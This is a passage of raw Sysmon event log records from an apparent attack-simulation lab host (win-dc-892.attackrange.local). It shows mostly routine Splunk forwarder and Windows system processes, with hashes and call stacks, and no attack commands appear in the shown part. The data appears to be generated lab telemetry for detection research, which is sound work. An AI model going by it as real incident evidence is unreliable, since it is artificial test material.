Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.334{266CAFBE-6662-6064-6C01-00000000AE01}6248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000010660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.209{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.865{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A0F966376FF26E18203975967E8C64C,SHA256=81FA5D26E15F5FD856CBCB3605318A8C61FB96B72BE0F8474FBB05A860207EF5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.834{266CAFBE-6663-6064-6E01-00000000AE01}36642840C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.662{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6663-6064-6E01-00000000AE01}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.662{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.662{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.662{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.662{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.662{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6663-6064-6E01-00000000AE01}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.662{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6663-6064-6E01-00000000AE01}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.662{266CAFBE-6663-6064-6E01-00000000AE01}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000010679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.146{266CAFBE-6662-6064-6D01-00000000AE01}30846328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:08.880{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=213F9EB336B2C37AF55AFBC4C3668488,SHA256=2040C5D1D07B5E103A4A3F75B5F20ED4E2B82168E731FD4A22B434FE040DE0DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:09.880{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B6561A1EFC0772495B93634764C44FB,SHA256=EDF5A9A7C6D93D69F4D1155F6A11A5CDFB741637F34EF40C95AF9DC488A3ECA4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:09.458{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6665-6064-6F01-00000000AE01}6848C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:09.458{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:09.458{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:09.458{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:09.458{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:09.458{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6665-6064-6F01-00000000AE01}6848C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:09.458{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6665-6064-6F01-00000000AE01}6848C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:09.459{266CAFBE-6665-6064-6F01-00000000AE01}6848C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:10.896{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85546686F2F4EE02B176D6A76666883D,SHA256=13379B53A44A17F9FEA04C0E74E68A4FF262C387A826602806D15CC4461216E8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:08.632{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53707-false10.0.1.12-8000- 23542300x800000000000000010702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:11.927{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B4177187C7DC20E0B13765C1C4B0C86,SHA256=12F2849E905A90D40EC2ACEA31DDDFA0508A9519C8570723996382F34F9B4A0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:12.989{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54E34CC4FEC08BD1C27FBB3141D4BC59,SHA256=7422AFA426B9D4B83E3A38A379E4513028F0A8AB07B17E90538FA5729DA7C5A0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:14.458{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:14.458{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:14.458{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:14.458{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:14.458{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 